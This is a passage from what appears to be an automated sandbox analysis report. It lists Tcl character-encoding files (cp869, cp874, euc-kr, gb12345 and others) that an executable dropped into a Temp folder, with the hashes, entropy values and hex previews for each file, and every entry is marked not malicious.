                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1090
                                                                                                                                                                                                                                                    Entropy (8bit):3.458262128093304
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:CtTUmJvRju3ShVbsZiAMiZyb7P4UN+lhNo5+8dKfQFhWGDrjz9:EgmOEVIwAMiw/PxYNo5+8dKfQFhWG3jZ
                                                                                                                                                                                                                                                    MD5:51B18570775BCA6465BD338012C9099C
                                                                                                                                                                                                                                                    SHA1:E8149F333B1809DCCDE51CF8B6332103DDE7FC30
                                                                                                                                                                                                                                                    SHA-256:27F16E3DD02B2212C4980EA09BDC068CF01584A1B8BB91456C03FCABABE0931E
                                                                                                                                                                                                                                                    SHA-512:EB285F0E5A9333FFF0E3A6E9C7CAC9D44956EDF180A46D623989A93683BC70EE362256B58EB9AED3BFC6B5C8F5DB4E42540DFC681D51D22A97398CD18F76A1E1
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: cp869, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080008100820083008400850386008700B700AC00A620182019038820150389.038A03AA038C00930094038E03AB00A9038F00B200B303AC00A303AD03AE03AF.03CA039003CC03CD039103920393039403950396039700BD0398039900AB00BB.25912592259325022524039A039B039C039D256325512557255D039E039F2510.25142534252C251C2500253C03A003A1255A25542569256625602550256C03A3.03A403A503A603A703A803A903B103B203B32518250C2588258403B403B52580.03B603B703B803B903BA03BB03BC03BD03BE03BF

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\cp874.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1090
                                                                                                                                                                                                                                                    Entropy (8bit):3.2660589395582478
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:CSyTUmJvRju3ShVbsZiAMiZyb7PQXzHmED43U/TW5dV:CgmOEVIwAMiw/PIr43UKV
                                                                                                                                                                                                                                                    MD5:7884C95618EF4E9BAA1DED2707F48467
                                                                                                                                                                                                                                                    SHA1:DA057E1F93F75521A51CC725D47130F41E509E70
                                                                                                                                                                                                                                                    SHA-256:3E067363FC07662EBE52BA617C2AAD364920F2AF395B3416297400859ACD78BB
                                                                                                                                                                                                                                                    SHA-512:374AA659A8DB86C023187D02BD7993516CE0EC5B4C6743AD4956AA2DDB86D2B4A57B797253913E08E40485BF3263FBD1C74DDE2C00E6F228201811ED89A6DFF0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: cp874, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.20AC008100820083008420260086008700880089008A008B008C008D008E008F.009020182019201C201D20222013201400980099009A009B009C009D009E009F.00A00E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F.0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F.0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F.0E300E310E320E330E340E350E360E370E380E390E3A00000000000000000E3F.0E400E410E420E430E440E450E460E470E480E49

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\cp932.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):48207
                                                                                                                                                                                                                                                    Entropy (8bit):3.450462303370557
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:LhuW1PJnT9TO7RaQiPCLUKr7KBi9FrOLdtZ7RkEw:LZPV9KuqTxFGXZlQ
                                                                                                                                                                                                                                                    MD5:AA4398630883066C127AA902832C82E4
                                                                                                                                                                                                                                                    SHA1:D0B3DEB0EE6539CE5F28A51464BFBB3AA03F28E5
                                                                                                                                                                                                                                                    SHA-256:9D33DF6E1CFDD2CF2553F5E2758F457D710CAFF5F8C69968F2665ACCD6E9A6FD
                                                                                                                                                                                                                                                    SHA-512:77794E74B0E6B5855773EE9E1F3B1DA9DB7661D66485DAE6F61CA69F6DA9FD308A55B3A76C9B887135949C60FC3888E6F9A45C6BC481418737AA452A0D9CAE64
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: cp932, multi-byte.M.003F 0 46.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080000000000000000000850086000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F.FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F.FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F.FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F.0000000000000000000000000000000000000000

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\cp936.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):132509
                                                                                                                                                                                                                                                    Entropy (8bit):3.458586416034501
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:1536:JUbXcUPivzybu9VBPbUQMp8nDr+VFQQHkrUkAEAd4WD7tH8dd1+a:muVDQEr2dhDBH8d3+a
                                                                                                                                                                                                                                                    MD5:27280A39A06496DE6035203A6DAE5365
                                                                                                                                                                                                                                                    SHA1:3B1D07B02AE7E3B40784871E17F36332834268E6
                                                                                                                                                                                                                                                    SHA-256:619330192984A80F93AC6F2E4E5EAA463FD3DDDC75C1F65F3975F33E0DD7A0BB
                                                                                                                                                                                                                                                    SHA-512:EA05CC8F9D6908EE2241E2A72374DAAD55797B5A487394B4C2384847C808AF091F980951941003039745372022DE88807F93EEF6CDB3898FBB300A48A09B66E8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: cp936, multi-byte.M.003F 0 127.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.20AC000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.000000000000000000000000000000000000000

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\cp949.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):130423
                                                                                                                                                                                                                                                    Entropy (8bit):3.0309641114333425
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:1536:fimT/rTarSdgL6MVTCwCWUw62Ljv10xb+KYTuHEh:ftT/IQYLzGxSdCy
                                                                                                                                                                                                                                                    MD5:6788B104D2297CBD8D010E2776AF6EBA
                                                                                                                                                                                                                                                    SHA1:904A8B7846D34521634C8C09013DBB1D31AF47CA
                                                                                                                                                                                                                                                    SHA-256:26BCB620472433962717712D04597A63264C8E444459432565C4C113DE0A240B
                                                                                                                                                                                                                                                    SHA-512:0DF73561B76159D0A94D16A2DAB22F2B3D88C67146A840CB74D19E70D50A4C7E4DDF1952B5B805471985A896CA9F1B69C3FC4E6D8D17454566D7D39377BA1394
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: cp949, multi-byte.M.003F 0 125.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.000000000000000000000000000000000000000

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\cp950.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):91831
                                                                                                                                                                                                                                                    Entropy (8bit):3.253346615914323
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:VkkmY4kD7HGJxYXIdjQW7GzvKHBDViIM1sbh+dJE+FKw0sXlWVvDg21jjA:mGfKqIQwGzv8D7ksb2Ur79jjA
                                                                                                                                                                                                                                                    MD5:A0F8C115D46D02A5CE2B8C56AFF53235
                                                                                                                                                                                                                                                    SHA1:6605FCCB235A08F9032BB45231B1A6331764664B
                                                                                                                                                                                                                                                    SHA-256:1FB9A3D52D432EA2D6CD43927CEBF9F58F309A236E1B11D20FE8D5A5FB944E6E
                                                                                                                                                                                                                                                    SHA-512:124EA2134CF59585DB2C399B13DE67089A6BB5412D2B210DF484FA38B77555AAF0605D04F441BDC2B0BE0F180FA17C145731D7826DA7556A573D357CC00A968F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: cp950, multi-byte.M.003F 0 88.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080008100820083008400850086008700880089008A008B008C008D008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\dingbats.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1093
                                                                                                                                                                                                                                                    Entropy (8bit):3.7149721845090347
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:vJM0UmJvRjuyfqYCsUBOdXBCbtwHviANskfUPiXFtoE4OSFgHrBPkq:vKfmOEqYCs6CXRPiANIiXFt9XSMdPH
                                                                                                                                                                                                                                                    MD5:7715CC78774FEA9EB588397D8221FA5B
                                                                                                                                                                                                                                                    SHA1:6A21D57B44A0856ABCDE61B1C16CB93F4E4C3D74
                                                                                                                                                                                                                                                    SHA-256:3BDE9AE7EAF9BE799C84B2AA4E80D78BE8ACBACA1E486F10B9BDD42E3AEDDCB2
                                                                                                                                                                                                                                                    SHA-512:C7500B9DD36F7C92C1A92B8F7BC507F6215B12C26C8CB4564A8A87299859C29C05DEFD3212DE8F2DB76B7DFAB527D6C7B10D1E9A9F6B682F1B5BC4911CFAD26C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: dingbats, single-byte.S.003F 1 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.00202701270227032704260E2706270727082709261B261E270C270D270E270F.2710271127122713271427152716271727182719271A271B271C271D271E271F.2720272127222723272427252726272726052729272A272B272C272D272E272F.2730273127322733273427352736273727382739273A273B273C273D273E273F.2740274127422743274427452746274727482749274A274B25CF274D25A0274F.27502751275225B225BC25C6275625D727582759275A275B275C275D275E007F.0080008100820083008400850086008700880089008A008B008C008D008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.0000276127622763276427652766276726632666266526602460246124622463.2464246524662467246824692776277727782779277A277B277C277D277E277F.2780278127822783278427852786278727882789278A278B278C278D278E278F.2790279127922793279421922194219527982799279A279B279C279D279E279F.27A027A127A227A327A427A527A627A727A82

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\ebcdic.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1054
                                                                                                                                                                                                                                                    Entropy (8bit):2.92745681322567
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:scICJZoBqoQzRKCGW5JyY9yZk3Vvd2p4Z4XgiAmV3q:JmqrRKCtEYYZk3V4WSwitV6
                                                                                                                                                                                                                                                    MD5:67212AAC036FE54C8D4CDCB2D03467A6
                                                                                                                                                                                                                                                    SHA1:465509C726C49680B02372501AF7A52F09AB7D55
                                                                                                                                                                                                                                                    SHA-256:17A7D45F3B82F2A42E1D36B13DB5CED077945A3E82700947CD1F803DD2A60DBF
                                                                                                                                                                                                                                                    SHA-512:9500685760800F5A31A755D582FCEDD8BB5692C27FEEEC2709D982C0B8FCB5238AFB310DCB817F9FE140086A8889B7C60D5D1017764CEB03CB388DD22C8E0B3E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:S.006F 0 1.00.0000000100020003008500090086007F0087008D008E000B000C000D000E000F.0010001100120013008F000A0008009700180019009C009D001C001D001E001F.0080008100820083008400920017001B00880089008A008B008C000500060007.0090009100160093009400950096000400980099009A009B00140015009E001A.002000A000E200E400E000E100E300E500E700F10060002E003C0028002B007C.002600E900EA00EB00E800ED00EE00EF00EC00DF00210024002A0029003B009F.002D002F00C200C400C000C100C300C500C700D1005E002C0025005F003E003F.00F800C900CA00CB00C800CD00CE00CF00CC00A8003A002300400027003D0022.00D800610062006300640065006600670068006900AB00BB00F000FD00FE00B1.00B0006A006B006C006D006E006F00700071007200AA00BA00E600B800C600A4.00B500AF0073007400750076007700780079007A00A100BF00D000DD00DE00AE.00A200A300A500B700A900A700B600BC00BD00BE00AC005B005C005D00B400D7.00F900410042004300440045004600470048004900AD00F400F600F200F300F5.00A6004A004B004C004D004E004F00500051005200B900FB00FC00DB00FA00FF.00D900F70053005400550056005700580059005A00B200D400D600D200D300D5.00300031003

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\euc-cn.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):85574
                                                                                                                                                                                                                                                    Entropy (8bit):2.3109636068522357
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:SgOycCs6mBixg1k6y8NMSwR8JMvz6VaVZmASVHBtGtRfS7FXtQ/RSJj9fNLSmXn/:SdC4BmCkjSwAO6VIrahNrVNTSYG3Oln
                                                                                                                                                                                                                                                    MD5:9A60E5D1AB841DB3324D584F1B84F619
                                                                                                                                                                                                                                                    SHA1:BCCC899015B688D5C426BC791C2FCDE3A03A3EB5
                                                                                                                                                                                                                                                    SHA-256:546392237F47D71CEE1DAA1AAE287D94D93216A1FABD648B50F59DDCE7E8AE35
                                                                                                                                                                                                                                                    SHA-512:E9F42B65A8DFB157D1D3336A94A83D372227BAA10A82EB0C6B6FB5601AA352A576FA3CDFD71EDF74A2285ABCA3B1D3172BB4B393C05B3B4AB141AAF04B10F426
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: euc-cn, multi-byte.M.003F 0 82.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080008100820083008400850086008700880089008A008B008C008D008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.000000000000000000000000000000000000000

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\euc-jp.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):82537
                                                                                                                                                                                                                                                    Entropy (8bit):2.267779266005065
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:c7C2o8+/s5VHxANqsFvGFkMpUEg4MWv947ebZ745zIPcvZ3p6JhE1mrUH2xUoSuL:U+UTHxAlFxkUeGcOmaj6JhEMrUwLf3d1
                                                                                                                                                                                                                                                    MD5:453626980EB36062E32D98ACECCCBD6E
                                                                                                                                                                                                                                                    SHA1:F8FCA3985009A2CDD397CB3BAE308AF05B0D7CAC
                                                                                                                                                                                                                                                    SHA-256:3BFB42C4D36D1763693AEFCE87F6277A11AD5A756D691DEDA804D9D0EDCB3093
                                                                                                                                                                                                                                                    SHA-512:0F026E1EF3AE1B08BBC7050DB0B181B349511F2A526D2121A6100C426674C0FB1AD6904A5CC11AA924B7F03E33F6971599BAF85C94528428F2E22DCB7D6FE443
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: euc-jp, multi-byte.M.003F 0 79.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080008100820083008400850086008700880089008A008B008C008D0000008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.000000000000000000000000000000000000000

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\euc-kr.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):93918
                                                                                                                                                                                                                                                    Entropy (8bit):2.3267174168729032
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:1/W3oNwgt2qyVY1OVxk6ZN4KYDN1uq44hohExh:1/W3pqv10xb+KYTuHEh
                                                                                                                                                                                                                                                    MD5:93FEADA4D8A974E90E77F6EB8A9F24AB
                                                                                                                                                                                                                                                    SHA1:89CDA4FE6515C9C03551E4E1972FD478AF3A419C
                                                                                                                                                                                                                                                    SHA-256:1F1AD4C4079B33B706E948A735A8C3042F40CC68065C48C220D0F56FD048C33B
                                                                                                                                                                                                                                                    SHA-512:7FC43C273F8C2A34E7AD29375A36B6CAC539AC4C1CDCECFAF0B366DCFE605B5D924D09DAD23B2EE589B1A8A63EE0F7A0CE32CE74AC873369DE8555C9E27A5EDF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: euc-kr, multi-byte.M.003F 0 90.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080008100820083008400850086008700880089008A008B008C008D008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.000000000000000000000000000000000000000

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\gb12345.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):86619
                                                                                                                                                                                                                                                    Entropy (8bit):2.2972446758995697
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:XSeUMIZQkyMiS4Y3fPOYo55XVi684z6WwQrrNoTRoyzDciB126afGG9whRJGAy/I:XhcQjSr3XeXVbmWdWd/zl5auG2hU/I
                                                                                                                                                                                                                                                    MD5:12DBEEF45546A01E041332427FEC7A51
                                                                                                                                                                                                                                                    SHA1:5C8E691AE3C13308820F4CF69206D765CFD5094B
                                                                                                                                                                                                                                                    SHA-256:0C0DF17BFECE897A1DA7765C822453B09866573028CECCED13E2EFEE02BCCCC4
                                                                                                                                                                                                                                                    SHA-512:FC8A250EE17D5E94A765AFCD9464ECAE74A4E2FF594A8632CEAEC5C84A3C4D26599642DA42E507B7873C37849D3E784CFB0792DE5B4B4262428619D7473FF611
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: gb12345, double-byte.D.233F 0 83.21.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.000030003001300230FB02C902C700A8300330052015FF5E2225202620182019.201C201D3014301530083009300A300B300C300D300E300F3016301730103011.00B100D700F72236222722282211220F222A222922082237221A22A522252220.23122299222B222E2261224C2248223D221D2260226E226F22642265221E2235.22342642264000B0203220332103FF0400A4FFE0FFE1203000A7211626062605.25CB25CF25CE25C725C625A125A025B325B2203B219221902191219330130000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\gb1988.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):3.1978221748141253
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:qrmTUmJvRju36hVbsZiAMiZyb7PN8pUPnfk5JM0RHFj:qSgmO8VIwAMiw/PNPQPFj
                                                                                                                                                                                                                                                    MD5:06645FE6C135D2EDE313629D24782F98
                                                                                                                                                                                                                                                    SHA1:49C663AC26C1FE4F0FD1428C9EF27058AEE6CA95
                                                                                                                                                                                                                                                    SHA-256:A2717AE09E0CF2D566C245DC5C5889D326661B40DB0D5D9A6D95B8E6B0F0E753
                                                                                                                                                                                                                                                    SHA-512:DB544CFE58753B2CF8A5D65321A2B41155FE2430DB6783DD2F20E1244657482072633D16C8AC99765C113B60E99C8718263C483763A34C5E4BB04B4FFBA41976
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: gb1988, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.002000210022002300A500250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D203E007F.0080008100820083008400850086008700880089008A008B008C008D008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F.FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F.FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F.FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F.000000000000000000000000000000000000000

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\gb2312-raw.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
